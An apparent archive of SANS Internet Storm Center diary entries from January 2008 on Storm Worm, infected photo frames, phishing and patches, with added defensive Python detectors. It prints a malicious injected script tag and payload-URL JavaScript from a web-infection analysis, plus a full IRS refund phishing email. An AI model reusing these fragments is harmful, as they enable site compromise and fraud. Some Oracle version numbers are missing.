Published: 2008-01-31

Storm Worm coming to an end?

According to this article over at internetnews.com, American and Russian law enforcement apparently know who created the Storm Worm.  The Storm Worm has plagued our email spam boxes for at least the past 3 or 4 holidays (US), and continues to be a nuisance because of its mutational ability.  Hopefully it's a short matter of time before this goes away.

(Of course only to be reborn in another form.)

We'll see.  In the meantime, take a look at the above article.

Joel Esler



Published: 2008-01-31

AT&T Wireless Data Outage

Thanks all of you that have written in.  We have seen the articles that say that AT&T is having a wireless data outage. 

We have heard from multiple sources on the issue, and it seems to be limited to only certain regions of the US.  (Central and South East primarily).  I am currently in the NE section of the country, writing this entry on my AT&T 3G Wireless card.  So I know it's working here (plus my iPhone and my wife's Blackberry work fine too).

We have also heard that this problem has been resolved.  So everything should be back (if not already) to normal soon.

Thank you for writing in all of you.

Joel Esler



Published: 2008-01-30

MS08-001 PoC exploit demonstrated

Yesterday Immunity Inc. published a flash movie demonstrating compromise of a WinXPSP2 system using an exploit they've developed for the IGMPv3 vuln that was announced by Microsoft earlier this month.

You can see the video here: http://immunityinc.com/documentation/ms08_001.html

And read a ComputerWorld article about it here: http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9060118




Published: 2008-01-30

Decreased/non-existent connectivity to the Middle-East

There are a number of sites reporting that the undersea cable that connected Italy and Egypt has been cut, resulting in a fairly complete outage of Internet connectivity in many parts of the Middle-East.

Additional details here: http://www.theregister.co.uk/2008/01/30/india_mideast_lose_internet/


See http://www.renesys.com/blog/2008/01/mediterranean_cable_break.shtml for additional technical information.



Published: 2008-01-29

Insignia Photo Frame Malware Request

We have had several reports of malware/viruses infecting some photo frames purchased around the holidays from Best Buy, Target and Walmart.  We are asking anyone who has a copy of the programs to upload them to our contact page so that we can review the programs and provide them to the Anti-Virus vendors.  We are hoping to get comparisons of the different malware found to determine if there is a correlation between frames and manufacturers.  Upload them to:




Published: 2008-01-29

Yet another Tax Scam

Consumers beware....  Tax scams via email, online and by telephone are ramping up, especially with the prospect of receiving the "rebate" from the Feds.  A report from Kansas City, Missouri indicates that the crooks are returning to the age-old telephone in order to attempt to scam consumers.  The FBI has reported that at least 4 people have been contacted.  Once again, just a reminder....  Use extreme care to not fall victim to these crooks.



Published: 2008-01-28

'Tis the Season for Tax Return Scams

It's that time of the year again, tax season.  With every tax season comes the latest in tax return phishes.  Below is a sample that started hitting the wires a bit ago, but standard click-and-get-0wned.  (This one pointed to a website that was down by the time I found it).  In this case, the phish also pointed into residential DSL space.  If someone out there happens to snag the malware this thing tries to get, a copy would be appreciated (I'm assuming they change the link in the email routinely).



Tax Notification
Internal Revenue Service (IRS)
United States Department of the Treasury

Date:  01/28/2008

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $134.80.

Please submit the tax refund request and allow us 6-9 days in order to process it.

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

To access the form for your tax refund, click here (BAD LINK HERE).

Internal Revenue Service
Document Reference: (92054568).

John Bambenek, bambenek /at/ gmail [dot] com



Published: 2008-01-28

Happy Data Privacy Day

The International Association of Privacy Professionals (IAPP) has made today Data Privacy Day.  Among other things, they encourage giving either of two presentations in local settings, "Privacy Today" on ways to protect your information and "Teen Privacy Online" that focuses on the use of social networking tools and risks that come with them.

The important note about this effort is that it focuses its attention on the weakest area of privacy protection, the individuals themselves.  If people do not protect their own information (for instance, by putting their entire lives in their Facebook profile) there is little other groups can do to prevent the misuse of that information.

John Bambenek, bambenek /at/ gmail [dot] com


Published: 2008-01-27

Digital Hitchhikers Part Four

If you recall, we started this thread on Christmas day with a short story about an infected digital photo frame purchased at a Sam's Club.  We were contacted by Wal-Mart's security team (Sam's Club is owned by Wal-Mart) a few days later.  They were aware of the problem as a result of reading our diary but could not replicate it with any frames they tested.  We also contacted the distributor of the frames (Advanced Design Systems) and they could not duplicate the problem either.  Since that original story we published an update on January 4th asking if anybody had seen similar problems with any device recently purchased that used a USB connection to communicate with a host computer.  That led to a second update on January 7th that contained more details about other devices that were infected.  Since then, more devices have been reported to the Internet Storm Center as being infected with malware and there have been a few media reports.

Of interest is a report this past week saying that Best Buy pulled thousands of digital photo frames from their shelves based on the presence of malware.  The supplier of the frames, Insignia, posted the technical information on their web site.  One of our readers observed that the photo frames purchased at Sam's Club have remote controls remarkably similar to the ones sold at Best Buy.  Check it out yourself:

Best Buy's frame and remote, distributed by Insignia.



Sam's Club's remote, distributed by Advanced Design Systems

The remotes are not exactly the same but the similarities are striking.  This led our reader to ponder whether there are more commonalities in these devices.  He suggested that looking at the two motherboards might offer clues.  So if anybody has both the ADS and the Insignia frames in their possession and don't mind cracking them open...

Here is what we know so far:

  • Five digital photo frames from Advanced Design System were bought at various Sam's Clubs containing malware.
  • Best Buy pulled from the shelves several thousand digital photo frames from Insignia that contained malware.
  • Our readers reported more malware found on other devices such as
    • a set of MP3 playing sunglasses (store where sold is not known)
    • a 250GB Maxtor External One Touch Backup from Radio Shack
    • a "Flip Video Camera" from a California Costco
    • a MemoryVue 1040 Plus digital photo frame from Digital Spectrum Incorporated that was purchased at a Canadian Costco
    • an 8-inch Castleton digital photo frame from Uniek that was purchased at a Target
    • a Maxtor One Touch 250GB external hard drive purchased at Fry's Electronics

We do not think that these situations are related but they do paint a picture of a new attack vector, the supply chain.  By the supply chain, we mean this process:

Factory -> Shipping -> Distributor -> Shipping -> Warehouse -> Shipping -> Retail Store -> Customer

Several readers have submitted ideas about how these devices got infected:

  • The user's computer was already infected but the user did not know it
  • The device was infected by a customer then returned to the store where it was repackaged and resold
  • A store employee infected the device as a prank
  • A customer infected the device as a prank
  • The retail store is not "clean" but checked returned electronics items with an infected computer, thus spreading malware from one returned product to another
  • The distributor or the warehouse infected the device
  • One or more of the shipping companies infected the device
  • It was infected at the factory

Whatever the cause, there seems to be some sort of breakdown in the security of the supply chain.  It's easy for retailers to blame the consumers but when the same malware shows up on products purchased at retail stores hundreds of miles apart by different customers it raises serious questions about the true source of the malware.

A final thought.  Many readers are aware of the penetration tests done about two years ago with USB memory sticks that were sprinkled around a victim site to see if employees would bring them in then plug them into corporate computers.  Knowing what you know now about this attack vector, how many digital photo frames are floating around your office that have already been plugged into your corporate computers?

More information about disabling the Autoplay function of Microsoft Windows is available at Microsoft's Technet site.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-01-26

On a slow day, an interesting read

I just finished reading an article and several blogs about some interesting web infections.  Without rehashing the stories, we are looking for any readers who have first hand experience with this, particularly the binaries for us to look at.

For further reading




Published: 2008-01-25

So.. Are all of the bad guys really on the outside?

Today Fox News reported that a 41-year-old Jacksonville, FL woman who, thinking that she was about to be replaced, deleted 7 years of drawings, blueprints and other files from her employer's server.  Estimated damage: $2.5 million.  The company owner said that they managed to recover the files by using an expensive data recovery service.


Today USAToday reported that a cable company accidentally deleted the inboxes, archives and files for about 14,000 of their customers.  They said that it was a software glitch, “That's because, a spokeswoman says, the company set out to delete inactive e-mail accounts, but ended up destroying thousands of active ones, too.”


As I read both of these stories I have to ask myself, “Where were the backups?”  In the first story, they had 7 years' worth of data, as they indicate $2.5 million worth; why on earth would they not have a backup?  What if it had been a drive failure that took out the drive instead of an employee purposely taking it out?  What would they have done then?  And in the case of the cable company, even if you don’t routinely back up the mail boxes, when doing maintenance such as this one, best practice is, “BACK IT UP”.  When doing any type of maintenance my experience says “Murphy’s Law Prevails”.

A little while ago I got a phone call from a friend of mine.  They own a small business and have one computer in the shop that contains all of their customer records, financials, and receivables.  I set up a backup for them and it was set to run every night after the shop closed.  She called and said that when she turned the computer on this morning it won’t load Windows, it says “insert system disk”.  I explained to her that it sounded like the hard drive had failed, that we would have to replace the hard drive and then restore from the last backup.  She said “well, that may be a problem”.  I asked her why and her reply was “well, we needed some space on the computer table to lay out some papers, so I unhooked the backup drive and forgot to plug it back in.”  Guess what, she wants to know if I can help get the data back….

So, all three of these “loss of data” situations were caused by insider errors.  One accidental, one on purpose and one…. Well, let’s not go there…

Another situation that popped up in the last couple of weeks was also caused by an insider.  Not on purpose, but nonetheless it happened.  I monitor the IP addresses that we “own” for any suspicious activity in an attempt to prevent us from getting blocklisted.  I noticed on both of the web sites that I check that one IP address was doing a lot of mailing.  I knew that this IP address belonged to a local financial institution and I knew that they did not have a mail server at that IP address.  I contacted the admin for the site and told him to take a look at his firewall logs and see if he saw anything unusual.  He called me back a short time later and said that there definitely was something going on and he was going to track down the offending machine and give me a call back.  About an hour later he indeed did call and tell me that he had found the problem.  Someone from the outside had brought in a laptop and plugged it into their network.  Now this was not intended to be malicious; the admin knew that the laptop was to be plugged in and he really didn’t think that there would be a problem because….  Are you ready for it….  It was the company that was hired to come in and audit the financial institution's records.  You got it; an auditor had a compromised computer.  He said that the auditor commented to him when they told him what his laptop was doing, “Geez, you know that explains it, I thought this thing was awfully slow lately”.

Therefore, I again say “The bad guys aren’t always on the outside”.


Thanks to one of our readers, Dan Jones, I am updating the diary with a link to an incredible piece of wisdom.




Published: 2008-01-24

MS08-001 updated

Microsoft updated MS08-001 to include Small Business Server 2003 SP2 as vulnerable. They also added to the FAQ to clarify that the MS Detection and Deployment tools will detect this and correctly patch it.




Published: 2008-01-24

Drive-by Pharming and attacks against network infrastructure

Symantec posted a blog entry about attackers using vulnerabilities in web browsers (CSRF and XSS, from our interpretation of the article) to reconfigure home routers/firewalls, changing their DNS servers to enable MITM attacks.  They report having seen a number of delivery methods for the attacks, including email and compromised or malicious websites.

The full article is here: http://www.symantec.com/enterprise/security_response/weblog/2008/01/driveby_pharming_in_the_wild.html

Heise.de also has an article about the issue (links to the Symantec post) for those of you who prefer reading german: http://www.heise.de/newsticker/meldung/102281

There are a number of moderately effective mitigations that you can use to prevent this (per Symantec):

  • change your default password on the router
  • turn off UPnP if you don't have an explicit, serious need for it
  • try using one of the less common RFC 1918 address ranges

And of course make sure that you are using up to date AV and firewall and IDS and everything else on your internal systems.

One of my fellow handlers pointed out that the most interesting and significant part of this issue is that it marks a change in targeting by attackers. The move from compromising the end-host to targeting the home routers & firewalls (or other infrastructure) has ugly implications about the way we are currently defending our systems.  Ideally a man in the middle attack should always be noticeable, but we all know that people tend to click "accept" way too quickly most of the time.


Published: 2008-01-23

Two New Cisco Vulnerabilities

Cisco released two advisories today, one for a risk of leaving a root account without a password in the Cisco Application Velocity System (AVS) and one for a potential DoS (forced reload) of the PIX 500 series and the Adaptive Security Appliance (ASA) for the Cisco 5500 series.

The AVS prior to version 5.1.0 doesn't prompt users to modify the system password during initial configuration, which potentially leaves you with a privileged account without a password.  The CVE ID for this is CVE-2008-0029 and full details can be found here:


The PIX and ASA are vulnerable to a specially crafted packet when they have the TTL decrement feature enabled.  The CVE ID for this is CVE-2008-0028 and full details can be found here:



Published: 2008-01-22

Happy Birthday Mozilla!

Mozilla is 10 years old today.  Ah, it was just 10 years ago? (Thanks for writing in Kevin) Where are we now?

Well, depending on what statistics and what country you look at for those statistics, the Firefox browser has about a 16-28% market share.  Not bad considering the number of browsers that are out there!

Normally here I would ask the readers to submit your favorite Firefox plugins (one of the best features of the browser), but the emails would number in the thousands.  So I'm not going to do that.  Let's just all thank Mozilla for the wonderful browser and market they have created.  I've always said diversity is key.  It's great that I have been to hundreds of organizations and I can honestly say that each one has had Firefox installed.  Maybe not as the default browser, but at least installed.

Anyway.  It's been a fast 10 years.

Joel Esler



Published: 2008-01-22

It's a slow day at the ISC offices

We haven't had much email from the readers today.  Half the US has the day off for Martin Luther King Jr day.  Hopefully tomorrow, when everyone gets back to work and discovers something to write into us about, we can article it up.  Even the tech news is slow today.  So, in light of the holiday here, we'll take the rest of the day off and be back tomorrow.


Joel Esler



Published: 2008-01-21

Exploiting the admin process

Today has been a rather slow day at the Internet Storm Center.  Perhaps some folks in the US actually got Martin Luther King, Jr. Day off from work (or maybe not).  We got e-mail from Jim and Gordon though that got me thinking.  Jim e-mailed to report what he thought were (and may well be) spoofed referrer strings showing up in his weblogs.  His concern was that some of these referrers might host malware, so an admin who was diligently monitoring their logs might get infected when trying to follow up on how users found their website.  Gordon reported some unexpected behavior from Kiwi Syslog Daemon which was being used to collect logs from a Sonicwall setup.  He noted that the firewall was showing outbound NetBIOS attempts to China (fortunately being blocked by the firewall) from the Windows machine collecting the logs.  It turns out that the Kiwi Syslog Daemon that he was using was attempting to look up the names (reverse lookups) of the machines that were hitting the firewall, first by DNS and then by NetBIOS (a feature that can apparently be disabled in v 8.3.6 BETA).  Again, this brought to mind the possibility that a responsible admin monitoring logs as they ought to could have that very diligence used against them.  I recall some time back an attack where folks were targeting, I think, one of the Apache log analyzers by crafting some of the data that gets logged (exact details escape me at the moment, I'll update the story with a link if I remember the details).  I'm not aware of this class of attacks being used widely these days, but I figured since it was slow, I'd ask our readers if they have seen any other attacks like this that actually target the diligent admin and what types of defenses you do (or should) take to protect against them.  The handlers kicked around a few thoughts among ourselves today and I'll include them with reader responses in a followup story.
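Both reports above come down to the same thing: data that ends up in a log (a Referer header, a source hostname) is attacker-controlled input, and the tooling that summarises it must treat it that way.  The following is an added example, not code from the diary or from any log analyzer it mentions: it parses Apache combined-format lines (an assumed layout) and builds a referrer report that escapes every value, shows referrers as text rather than links, and flags ones carrying markup.

```python
import html
import re
from collections import Counter

# Apache/NCSA "combined" log format (assumed layout of the input lines):
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Markup or script fragments that have no business in a Referer header;
# a log viewer that renders the field unescaped would execute them.
SUSPICIOUS_RE = re.compile(r"<|>|javascript:|%3c|%3e|\\x[0-9a-f]{2}", re.IGNORECASE)


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def referer_summary(lines):
    """Count referrers and return (counts, flagged).  counts maps the raw
    referrer string to its hit count; flagged lists referrers carrying markup."""
    counts = Counter()
    flagged = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None or rec["referer"] == "-":
            continue
        ref = rec["referer"]
        counts[ref] += 1
        if SUSPICIOUS_RE.search(ref) and ref not in flagged:
            flagged.append(ref)
    return counts, flagged


def render_rows(counts):
    """HTML table rows with the referrer escaped and shown as plain text,
    never as a clickable link, so nobody follows it straight from the report."""
    return ["<tr><td>%d</td><td>%s</td></tr>" % (n, html.escape(ref, quote=True))
            for ref, n in counts.most_common()]


# Constructed sample log lines (TEST-NET addresses); the third carries a
# referrer of the kind Jim reported, spoofed to contain script.
SAMPLE_LOG = [
    '203.0.113.9 - - [21/Jan/2008:10:15:32 -0600] "GET /diary.html HTTP/1.1" 200 5123 '
    '"http://www.example.org/search?q=isc" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Jan/2008:10:16:01 -0600] "GET /diary.html HTTP/1.1" 200 5123 '
    '"http://www.example.org/search?q=isc" "Mozilla/5.0"',
    '198.51.100.23 - - [21/Jan/2008:11:02:44 -0600] "GET / HTTP/1.0" 200 2048 '
    '"http://bad.example/<script>alert(1)</script>" "curl/7.16"',
    '198.51.100.24 - - [21/Jan/2008:11:03:10 -0600] "GET / HTTP/1.0" 200 2048 '
    '"-" "Mozilla/4.0"',
]


if __name__ == "__main__":
    counts, flagged = referer_summary(SAMPLE_LOG)
    print("\n".join(render_rows(counts)))
    for ref in flagged:
        print("suspicious referrer (do not visit):", html.escape(ref))
```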


Published: 2008-01-20

Not so boring night....

Last night an outage occurred at the backbone level, causing an outage on the popular Massively Multiplayer Online Role Playing Game (MMORPG) World of Warcraft.  It looks as if things have returned to normal now.  The interesting thing here is that, even on a Saturday night/Sunday morning, the internet is still as heavily used, or almost as heavily used, as during the day.  Gone are the days where, on a weekend night, a major provider can take a 4-hour stint for some downtime maintenance.  Looking at the report from the past 4 hours, we can see that there were still some slow spots in the country.


Published: 2008-01-19

Industrial Control System Attacks

At the recent SANS SCADA Summit in New Orleans a CIA spokesman gave the audience these chilling comments:

"We have information, from multiple regions outside the United States, of cyber intrusions into utilities, followed by extortion demands. We suspect, but cannot confirm, that some of these attackers had the benefit of inside knowledge. We have information that cyber attacks have been used to disrupt power equipment in several regions outside the United States. In at least one case, the disruption caused a power outage affecting multiple cities. We do not know who executed these attacks or why, but all involved intrusions through the Internet."

More information on the event is available in the current SANS NewsBites.

Here at the Internet Storm Center we rarely hear about intrusions into the PCS/SCADA community (Process Control Systems / Supervisory Control And Data Acquisition.)  If you are an industrial control system asset owner and are willing to share information about cyber attacks you have witnessed, please do so via our contact page.  We will maintain your privacy and anonymity if you desire, but please provide enough detail so that other readers and asset owners can understand the nature of the incident you experienced.  We'll publish a summary in a future diary.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-01-18

More about mass web infections

A couple of days ago Mari posted a diary (http://isc.sans.org/diary.html?storyid=3834) about mass web infections; other sources like the Register reported on the same thing.

I’ve been playing with one compromised web site today and was trying to figure out what the infection vector is.

Some general information first. On all compromised sites the bad guys installed a server side script. This script embeds a script tag pointing to another JavaScript file on the same server, hosting various exploits. This script is randomly generated. The compromised server also caches the IP address of the client so subsequent requests for the same page from the same IP address will not contain the script tag to the malicious JavaScript file. So, the first visit to a compromised web site will include the link:

<script language='JavaScript' type='text/javascript' src='egmjh.js'></script>

<div id="page">

While subsequent visits will not:

<div id="page">

The JavaScript file has some trivial obfuscation; what’s interesting is that they created a generic part which handles the final URL that will be used to download the malware from:

var arg="mvdrzjyh";
var MU = "http://" +document.location.hostname + "/" + arg;

var MU2 = "\"" + MU + "\"";

The MU2 variable is then inserted in the exploit code (which is split using the escape() calls). This makes the exploit code “universal” – it works on every compromised server and the server side script only has to set the arg parameter (the name of the final binary that gets pulled and executed on a vulnerable client) as the hostname will be set automatically by the browser. The rest is simple (and has been written about by others so I won’t spend time on that) – the script tries to exploit multiple vulnerabilities and if successful will result in the binary executed on the system.
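Because the server remembers the visiting IP, a second fetch from the same address looks clean, so a defender has to compare a first and a repeat response from one client rather than a single fetch.  The following is an added example, not code from the diary or from the compromised sites it describes: it diffs the script tags of two such responses, applies a vowel-ratio heuristic (an assumed threshold) for the random names seen above, and rebuilds the download URL the injected JavaScript composes so it can be blocked or searched for in proxy logs.  The page URL and HTML samples are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in an HTML document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def script_srcs(html_text):
    """Return the script src values of a document in order of appearance."""
    parser = _ScriptSrcCollector()
    parser.feed(html_text)
    parser.close()
    return parser.srcs


def looks_random(url_or_name):
    """Heuristic for the generated names in the diary (egmjh.js, mvdrzjyh):
    a short run of lowercase letters with almost no vowels.  The 25% vowel
    threshold is an assumption; tune it against your own site's script names."""
    stem = url_or_name.rsplit("/", 1)[-1].split(".", 1)[0]
    if not re.fullmatch(r"[a-z]{5,12}", stem):
        return False
    vowels = sum(ch in "aeiou" for ch in stem)
    return vowels / len(stem) < 0.25


def first_visit_only_scripts(first_html, repeat_html, page_url):
    """Scripts served on the first visit but absent from the repeat visit,
    as absolute URLs resolved against page_url.  Both responses must have
    been fetched from the same client IP, since that is what the server caches."""
    repeat = set(script_srcs(repeat_html))
    return [urljoin(page_url, src) for src in script_srcs(first_html)
            if src not in repeat]


def suspicious_injections(first_html, repeat_html, page_url):
    """Injected scripts that live on the same host and have a random-looking name."""
    site_host = urlsplit(page_url).hostname
    return [url for url in first_visit_only_scripts(first_html, repeat_html, page_url)
            if urlsplit(url).hostname == site_host and looks_random(url)]


def payload_url(hostname, arg):
    """Rebuild the URL the injected script composes in MU:
    "http://" + document.location.hostname + "/" + arg."""
    return "http://" + hostname + "/" + arg


# Constructed sample pages: the first response carries the injected tag
# right before <div id="page">, the repeat response from the same IP does not.
PAGE_URL = "http://www.example.com/index.html"  # placeholder host

FIRST_VISIT = """<html><head><title>Example</title>
<script type='text/javascript' src='/js/site.js'></script></head><body>
<script language='JavaScript' type='text/javascript' src='egmjh.js'></script>
<div id="page">Welcome</div></body></html>"""

REPEAT_VISIT = """<html><head><title>Example</title>
<script type='text/javascript' src='/js/site.js'></script></head><body>
<div id="page">Welcome</div></body></html>"""


if __name__ == "__main__":
    for url in suspicious_injections(FIRST_VISIT, REPEAT_VISIT, PAGE_URL):
        print("injected script:", url)
    print("expected payload URL:", payload_url("www.example.com", "mvdrzjyh"))
```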

Another interesting thing is that the binary seems to be repacked on the compromised system as well. I pulled a couple of binaries from different clients and every time received a different sample (and AV detection was pretty poor).

Two main questions are still not answered here: how do those servers get initially compromised and what kind of server side application do the bad guys install?

There has been a lot of speculation about server side stuff. Some sources claim that compromised servers are running a rootkit and an evil Apache module that does this JavaScript injection and random file generation on the fly.

So a call for samples/logs/packets – if you have access to one of the compromised servers we would appreciate any information that can help resolve this.





Published: 2008-01-18

Issues with X11 and Citrix

Remote vulnerabilities for two graphical user environments have been announced, four for an environment which has been around since the beginning of distributed computing, and one with a newer contender.

iDefense has released four advisories covering various vendors' implementations of the popular X11 server:

  • Multiple Vendor X Server XInput Extension Multiple Memory Corruption Vulnerabilities (CVE-2007-6427)
  • Multiple Vendor X Server TOG-CUP Extension Information Disclosure Vulnerability (CVE-2007-6428)
  • Multiple Vendor X Server EVI and MIT-SHM Extensions Integer Overflow Vulnerabilities (CVE-2007-6429)
  • Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability (CVE-2007-5760)

ZDI has released a remotely exploitable vulnerability affecting the following Citrix products:

  • Metaframe Presentation Server 3.0
  • Presentation Server 4.0, 4.5
  • Access Essentials 1.0, 1.5, 2.0
  • Desktop Server 1.0

This vulnerability does not require prior authentication to Citrix.

Citrix Presentation Server IMA Service Heap Overflow Vulnerability (ZDI-08-002)



Published: 2008-01-17

Large scale recovery

Scott emailed an interesting question the other day which I’m going to flick pass to you all. 

We all have workstations in our organisations.  They run AV products, encryption software, FW, management tools etc, a nice mix of products that we use to protect and manage workstations.  And they all play nice right?

Well what if they don’t?  For example, what if there is a nasty conflict between products, a patch messes one or more of the products up, a virus runs wild, or even something as simple as a group policy screws up.   But the fix, rather than a swift click on a button, means you have to go to each machine, boot it into safe mode, make a change, then reboot.  How do you recover your workstation environment? 

Now the answer is relatively simple if there are only a few machines involved, you might send junior on the road to fix all the machines, one by one.  It will keep him out of your hair for a bit.  But what if there are 100, 1000 or even 10,000+ machines to fix?  Even junior will need a white coat after a while. 

So here is a little scenario for you all to have a think about.   The company has 8000 workstations at several locations, some behind relatively slow lines.   A nasty little virus has slipped through and 4,000 machines have been infected.   Automated cleanups do not work and the only choice left is to manually inspect and clean the machine or reimage.  Luckily head office has nice clean images for all the hardware deployed.   

So what can we do?  Are local recovery partitions on workstations the go? Imaging servers, maybe one at each remote location? Bootable imaging DVDs, deployment products, packaging products?  Should we change the environment, use thin clients, PXE??

What do you do?  Send us your ideas on how you already cope or would cope with having to do a large scale recovery of workstations.   I’ll collate the responses and you never know your idea may save someone’s junior from wearing a white coat.



Published: 2008-01-17

Shorts - other things happening this week.

There have been a few interesting things over the last few days that are worth a mention.  We’ll start with malware.

We’ve had some reports of a new round of Dept of Justice messages (thanks Steve).  You know the one:“A complaint has been filled against the company you are affiliated to ....” .  This particular text variation was first reported in early December, but seems to have received a new lease of life and a nice new payload to go along with it.  It was detected by only 4/32 on virustotal (should be close to 32/32 by now).  The other thing was that it was well targeted.  The name was correct as was the company name.  So someone has a good quality list.  The attachment was called PDF_Complaint.scr, luckily most of us already drop this extension at the gateway.

Another oldie, but goodie (the original goes back to 2006) was provided by Johan, who received a SPIM.   The message was along the lines of:  “Hi, my name is <name>.  I am studying in <country>.  I’m looking for a friend/partner ...etc”.   The link to the photos of the young lady takes you to Russia and provides you with a little extra code.   A file called ntos.exe is created and the registry is then modified replacing winlogin.exe with the new file.   You are now providing information to those that will use it for you.

We also received a report on SMS phishing.  An SMS is sent: “Dear <insert bank name> customer, we are informing you that your online services have expired and needs to be renewed.  Please visit us at ...URL...”.   At the URL in the message a “special” surprise awaits.

So keep an eye on those mobiles.  Keep blocking those files that should never be emailed, and patch.  A significant portion of the malware we see exploits relatively old vulnerabilities.  Why?  Because they still work.





Published: 2008-01-16

Deja Vu: Valentine's Storm

Yesterday we started receiving another wave of Storm e-mails, this time exploiting our love: you got it, Storm started exploiting Valentine’s Day. It looked like they missed the ball for Christmas but now they are certainly back.

The e-mails Storm is sending are the same as in the last couple of waves – a subject designed to catch your attention and a body with a URL consisting of only an IP address (in other words, it should be easy to detect this with anti-spam tools).

Once a user visits the web site he is served with a nice web page (see below) and a link to download an executable – same as with previous versions.

Valentine Storm

So is there anything new about this variant of Storm? Not really. The social engineering attack is the same as before. Actually, there are a lot of similarities with Storm’s Valentine’s attack last year (2007). The subjects are almost the same and the only difference is that last year Storm sent itself as an attachment.

Storm’s packing/obfuscation techniques are still up to the task – when I downloaded the first variant only 4 anti-virus programs out of 32 on VirusTotal properly detected it with virtually no coverage amongst the most popular anti-virus programs. These results are not completely correct since some AV programs are able to block Storm when the user tries to execute it, due to behavior analysis. That being said, it still shows that the server side packing/obfuscation Storm uses works.

Following the pattern, we can probably expect the Super Bowl to be exploited soon as well.
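The one reliable structural tell in these waves is the link itself: a bare IP address where a hostname should be.  The following is an added example, not code from the diary or from any anti-spam product: it pulls absolute URLs out of a message body, keeps only those whose host parses as an IP literal (IPv4 or IPv6, with or without a port), and classifies the message on that basis.  Sample messages use TEST-NET addresses and are constructed, not captured Storm mails.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Absolute http/https URLs; trailing punctuation is trimmed afterwards.
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def bare_ip_urls(text):
    """Return the URLs in text whose host part is an IP literal rather than
    a hostname, the pattern the Storm lure mails use."""
    hits = []
    for raw in URL_RE.findall(text):
        url = raw.rstrip(".,;:!?)")
        host = urlsplit(url).hostname   # strips scheme, port, path, brackets
        if host is None:
            continue
        try:
            ip_address(host)
        except ValueError:
            continue                    # ordinary hostname, not interesting here
        hits.append(url)
    return hits


def classify(message):
    """'suspect' when the body links to a bare IP address, otherwise 'ok'."""
    return "suspect" if bare_ip_urls(message) else "ok"


# Constructed samples (documentation addresses, not real Storm nodes).
STORM_LURE = """Subject: I Love You Soo Much

http://203.0.113.45/
"""

STORM_LURE_WITH_PORT = """Subject: Sent with Love

See it here: http://198.51.100.7:8080/love.exe.
"""

STORM_LURE_IPV6 = """Subject: Valentine card

http://[2001:db8::1]/card
"""

NEWSLETTER = """Subject: January newsletter

Read it at http://www.example.org/news/january and https://example.org/.
"""


if __name__ == "__main__":
    for name, msg in [("storm", STORM_LURE), ("storm+port", STORM_LURE_WITH_PORT),
                      ("storm v6", STORM_LURE_IPV6), ("newsletter", NEWSLETTER)]:
        print(name, classify(msg), bare_ip_urls(msg))
```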




Published: 2008-01-16

New MS Excel vulnerability could allow remote code execution

Microsoft has just released an advisory and blog entry on a newly discovered vulnerability in MS Excel products. The vulnerability is, according to the blog, already actively exploited by targeted attacks.  Excel 2003SP3 and Excel 2007 are not affected, but most other versions are.


Published: 2008-01-15

Apple releases QuickTime 7.4 with security fixes

Apple has just released QuickTime 7.4 which fixes several security vulnerabilities:

  • CVE-2008-0031: A maliciously crafted Sorensen 3 movie file may lead to arbitrary code execution;
  • CVE-2008-0032: A maliciously crafted movie file may lead to arbitrary code execution during the handling of Macintosh resource records;
  • CVE-2008-0033: A maliciously crafted movie file may lead to arbitrary code execution during parsing of Image Descriptor atoms;
  • CVE-2008-0036: A maliciously crafted PICT image may lead to arbitrary code execution;

Note that this update does not yet appear to resolve the critical vulnerability reported last week by Luigi Auriemma (VU #112179).


Published: 2008-01-15

Oracle releases January 2008 Critical Patch Update

The January 2008 Critical Patch Update contains 27 security fixes, of which the highest CVSS score is 6.8 for servers and 9.3 for Application Server clients. The following Oracle versions are affected by vulnerabilities fixed in this patch release:

Oracle Database 11g, version
Oracle Database 10g Release 2, versions,
Oracle Database 10g, version
Oracle Database 9i Release 2, versions,
Oracle Application Server 10g Release 3 (10.1.3), versions,,,
Oracle Application Server 10g Release 2 (10.1.2), versions -,,
Oracle Application Server 10g (9.0.4), version
Oracle Collaboration Suite 10g, version 10.1.2
Oracle E-Business Suite Release 12, versions 12.0.0 - 12.0.3
Oracle E-Business Suite Release 11i, versions 11.5.9 - 11.5.10 CU2
Oracle Enterprise Manager Grid Control 10g Release 1, versions,
Oracle PeopleSoft Enterprise PeopleTools versions 8.22, 8.47, 8.48, 8.49
Oracle PeopleSoft Enterprise Human Capital Management versions 8.9, 9.0 (Absence Management Module)

More information and downloads at Oracle.


Published: 2008-01-15

Flash UPNP attack vector

GNUcitizen has issued a blog posting regarding a new method of exploiting UPNP-enabled devices - by having a user access a malicious SWF file. The group was able to identify how Flash can be used to generate a URLRequest to a UPNP control point, allowing an external party to reconfigure that device.

One limiting factor is that the IP address of the router needs to be known, but on most end user networks this is trivial: these machines are within well known private ranges and are generally at the .1 or .254 end of the spectrum. With further review and information pending, we suggest evaluating (as with any piece of functionality) whether there is a legitimate need to have UPNP enabled on affected devices. Some guidance from the US-CERT can be found here.


Published: 2008-01-15

Targeted attacks: behind the media reports

Between Christmas and New Year, I spoke at the Chaos Communications Congress in Berlin on targeted attacks. Some basic findings included:

  • Office applications are the most common targets, but utilities such as archivers that are seldom updated by the user are also commonly exploited;
